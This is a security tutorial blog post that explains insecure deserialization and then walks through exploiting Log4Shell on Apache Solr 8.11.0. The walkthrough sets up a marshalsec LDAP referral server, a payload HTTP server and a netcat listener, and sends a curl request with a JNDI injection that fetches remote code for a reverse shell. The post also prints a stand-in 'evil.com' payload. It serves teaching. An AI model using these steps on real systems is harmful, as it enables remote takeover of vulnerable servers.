Welcome back, rising cyberwarriors! Insecure deserialization represents one of the most critical security vulnerabilities in modern software applications, ranking among OWASP’s Top 10 Web Application Security Risks (part of Software and Data Integrity Failures). This vulnerability occurs when applications deserialize untrusted data without proper validation, potentially allowing attackers to execute arbitrary code, manipulate application logic, […]
The post Insecure De-serialization: Millions of Applications May Be Vulnerable first appeared on Hackers Arise.
Welcome back, rising cyberwarriors!
Insecure deserialization represents one of the most critical security vulnerabilities in modern software applications, ranking among OWASP’s Top 10 Web Application Security Risks (part of Software and Data Integrity Failures). This vulnerability occurs when applications deserialize untrusted data without proper validation, potentially allowing attackers to execute arbitrary code, manipulate application logic, or gain unauthorized system access.
The Apache Log4j vulnerability (CVE-2021-44228), discovered in December 2021, exemplifies the devastating impact of insecure deserialization. Known as “Log4Shell,” this zero-day vulnerability affected millions of applications worldwide, demonstrating how a seemingly innocuous logging library could become a gateway for remote code execution attacks.
In this article I want to explores the fundamental concepts of serialization and deserialization, examines the mechanisms behind insecure deserialization attacks, and provides an analysis of how these principles manifested in the Log4j vulnerability.
Historical Context and Timeline
The concept of serialization has been integral to computing since the early days of distributed systems. However, the security implications of deserialization have evolved significantly over time:
Early Era (1990s-2000s):
- Serialization primarily used for data storage and inter-process communication
- Security considerations were minimal, focusing mainly on data integrity
- Limited awareness of deserialization as an attack vector
Recognition Phase (2000s-2010s):
- First documented deserialization attacks emerged
- Security researchers began identifying patterns in vulnerable implementations
- Languages like Java, Python, and .NET showed susceptibility to deserialization exploits
Modern Era (2010s-Present):
- Widespread adoption of serialization in web applications and microservices
- OWASP recognition of insecure deserialization as a top security risk
- High-profile vulnerabilities in popular frameworks and libraries
Log4j Timeline:
- 2013: Log4j 2.0 released with JNDI lookup functionality
- 2021: Vulnerability disclosed privately to Apache Foundation
- December 9, 2021: CVE-2021-44228 publicly disclosed
- December 10, 2021: Proof-of-concept exploits widely available
- December 2021: Multiple patches released (2.15.0, 2.16.0, 2.17.0)
- Ongoing: Continued discovery of related vulnerabilities and bypass techniques
Understanding Serialization and Deserialization
Serialization is the process of converting an object’s state into a format that can be stored, transmitted, or reconstructed later. This process enables applications to:
- Persist object states to disk or databases
- Transmit complex data structures over networks
- Cache application states for performance optimization
- Enable inter-process communication in distributed systems

During serialization, an object’s instance variables, class information, and metadata are encoded into a byte stream or text format. The serialized data contains instructions for reconstructing the original object, including class definitions, field values, and object relationships.
Deserialization reverses the serialization process, reconstructing objects from their serialized representations. This involves:
- Data Parsing: Reading and interpreting the serialized format
- Class Loading: Instantiating the appropriate object classes
- State Reconstruction: Populating object fields with deserialized values
- Method Execution: Potentially triggering constructor methods or initialization code
The security risk emerges during this process when applications deserialize untrusted data without proper validation, allowing attackers to manipulate the deserialization process.
Common Serialization Formats
Modern applications utilize various serialization formats, each with distinct characteristics and security implications:
Format | Type | Security Level | Performance | Human Readable | Schema Support |
---|---|---|---|---|---|
Java Native | Binary | Low | High | No | Implicit |
Protocol Buffers | Binary | High | Very High | No | Explicit |
JSON | Text | Medium | Medium | Yes | Optional |
XML | Text | Medium | Low | Yes | DTD/XSD |
YAML | Text | Low | Medium | Yes | Optional |
Apache Avro | Binary | High | High | No | Explicit |
Java Native Serialization:
- Uses Java’s built-in serialization mechanism
- Produces binary output with class metadata
- Highly vulnerable to deserialization attacks
- Common in enterprise Java applications
Protocol Buffers (protobuf):
- Google’s language-neutral serialization format
- Efficient binary encoding with schema definitions
- Generally safer due to strict schema validation
- Requires explicit field definitions
Apache Avro:
- Schema-based serialization system
- Supports schema evolution and compatibility
- Binary format with JSON schema definitions
- Used extensively in big data ecosystems
JSON (JavaScript Object Notation):
- Human-readable text format
- Language-independent data interchange
- Limited object type support
- Generally safer but still vulnerable in certain contexts
XML (eXtensible Markup Language):
- Structured markup language
- Supports complex hierarchical data
- Vulnerable to XML External Entity (XXE) attacks
- Requires careful parsing to prevent security issues
YAML (YAML Ain’t Markup Language):
- Human-readable data serialization standard
- Supports complex data structures
- Can execute arbitrary code during deserialization
- Requires careful configuration for security

While different programming languages may use varying keywords and functions for serialisation, the underlying principle remains consistent. Whether Java, Python, .NET, or PHP, each language implements serialisation to accommodate specific features or security measures inherent to its environment.
Serialization in PHP involves converting data structures or objects into a string format for storage or transfer, and then reconstructing them later. PHP uses the built-in serialize()
function to create this string representation and unserialize()
to revert it back. These functions work on arrays, objects, and scalar types but exclude resources and some internal objects. Serialized data includes metadata about types and values, preserving the state of objects including class information. PHP allows customization of serialization in classes via magic methods such as __serialize()
and __unserialize()
, which are the recommended approach since PHP 7.4, replacing older methods like __sleep()
and __wakeup()
.

Python handles serialization primarily with the pickle
module, which can serialize nearly any Python object, including custom classes, into a binary format; this is reversed by pickle.load()
. For simpler or language-independent serialization, Python also offers the json
module, which converts between JSON strings and Python dictionaries or lists.
Language | Built-in Serialization | Common Customization | JSON Support |
---|---|---|---|
PHP | serialize() /unserialize() | Magic methods (__sleep ,__wakeup ,__serialize ,__unserialize ) | json_encode() /json_decode() |
Python | pickle.dump() /pickle.load() | Custom class methods and third-party libraries | json.dumps() / json.loads() |
The Log4j Case
At this point we grasped some basics of serialization and ready to move on to Log4j vulnerability.
Log4j is a Java-based logging framework broadly used in enterprise and cloud applications. Its core function is to append events, messages, and context into logs. With the introduction of JNDI (Java Naming and Directory Interface) lookup functionality in Log4j 2, log messages could reference external resources using special patterns, such as ${jndi:ldap://server/path}
.
When Log4j encountered such a lookup in a log message (for example, if an attacker sent it in an HTTP User-Agent or another field that the application logs), the framework would perform a JNDI lookup. If the referenced server was under attacker control, the result could be malicious Java code—serialized as remote objects or stubs—being sent back to the application. Upon receipt, the JVM would deserialize this data, potentially triggering remote code execution.
In classic insecure deserialization, an attacker manipulates serialized data to inject malicious objects or payloads. In Log4j, the exploit chain worked as follows:
- Attacker injects
${jndi:ldap://evil.com/a}
into any input logged by Log4j. - Log4j parses the log event and initiates a JNDI lookup.
- The attacker’s LDAP server responds with a reference to a remote Java class (serialized code).
- The application fetches and loads this code, executing it, thus granting the attacker arbitrary code execution.
Reconnaissance
The sheer danger of this vulnerability stems from how ubiquitous the logging package is. Millions of applications, as well as software providers, use Log4j as a dependency in their own code.
For this example, I’ll demonstrate the vulnerability on Apache Solr 8.11.0, which is one example of software known to include this vulnerable Log4j package.
To begin, start with basic reconnaissance to identify which ports are open on the system and what is running on port 8983 in this case.


Exploitation
We’re going to use a free, publicly available tool to set up something called an “LDAP Referral Server.” This server’s job is to take the victim’s first request and send it somewhere else.
Here’s how it works step-by-step:
- The victim’s system tries to connect using something like
${jndi:ldap://attackerserver:1389/Resource}
— this contacts our LDAP Referral Server. - The LDAP Referral Server then forwards this request to another location, like
http://attackerserver/resource
. - The victim’s system goes to that second location and downloads code from there.
- That code runs on the victim’s machine.
The initial LDAP request can’t deliver the actual malicious code directly — it’s more like a pointer or referral telling the victim’s system where to go next. The LDAP Referral Server acts as a middleman that sends the victim to an HTTP server where the real payload (the malicious code) is hosted. This allows us to deliver and run more complex or larger code that can’t be included in the first LDAP request alone.
To do all this, we need an HTTP server running (on port 8000 or similar) to host and serve that code.
Step 1: Install Java
The first step is to obtain the LDAP Referral Server. We will use the marshalsec utility, available at https://github.com/mbechler/marshalsec. But it requires running Java, version 8 is recommended.
We can download it form the Oracle archive: https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

Run the following commands to configure your system to use this Java version by default:
kali> sudo mkdir /usr/lib/jvm
kali> cd /usr/lib/jvm
kali> sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz
kali> sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
kali> sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
kali> sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
kali> sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
kali> sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
kali> sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
Then, check the version:
kali> java -version

Step 2: Download marshalsec
The simplest approach is to download the repository from GitHub:
kali> git clone https://github.com/mbechler/marshalsec
kali> cd marshalsec
Next, we need to build marshalsec with the Java builder maven:
kali> sudo apt install maven
kali>
mvn clean package -DskipTests

With the marshalsec utility built, we can start an LDAP referral server to direct connections to our secondary HTTP server (which we will prepare later). The syntax to start the LDAP server is as follows:
kali> java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://IP:Port/#Exploit"

Now that our LDAP server is ready and waiting, we can open a second terminal window to prepare our final payload and set up a secondary HTTP server.
Ultimately, the Log4j vulnerability will execute arbitrary code that you craft in the Java programming language. In this example, we will retrieve a reverse-shell connection to gain control over the target machine.
Create a new file named Exploit.java:

Next, we need to compile this payload with:
kali> javac Exploit.java -source 8 -target 8

We can see a warning – you might not see it yourself. It appears because I have multiple versions of Java installed. Regardless, the Exploit.class file was created successfully.
With the payload now created and compiled, we can start a temporary HTTP server.
kali> python3 -m http.server

Next, we’re ready to prepare a netcat listener:
kali> nc -lnvp port

Finally, all that is left to do is trigger the exploit and fire off our JNDI syntax:
kali> curl 'http://IP:8983/solr/admin/cores?foo=$\{jndi:ldap://IP:1389/Exploit\}'

And we’ve achieved RCE!
Summary
Insecure de-serialization is a serious and common problem in modern software. The Log4j “Log4Shell” vulnerability shows how not checking data carefully during de-serialization can lead to dangerous remote code execution attacks that affect many systems worldwide. This case teaches us an important lesson: any part of software that reads, creates, or runs code from outside inputs must always be carefully checked and protected.
For those interested in improving their cybersecurity skills, especially in understanding and defending against complex vulnerabilities like insecure de-serialization, Hackers-Arise offers expert-led training programs. Check it out!
The post Insecure De-serialization: Millions of Applications May Be Vulnerable first appeared on Hackers Arise.
Source: HackersArise
Source Link: https://hackers-arise.com/insecure-de-serialization-millions-of-applications-may-be-vulnerable/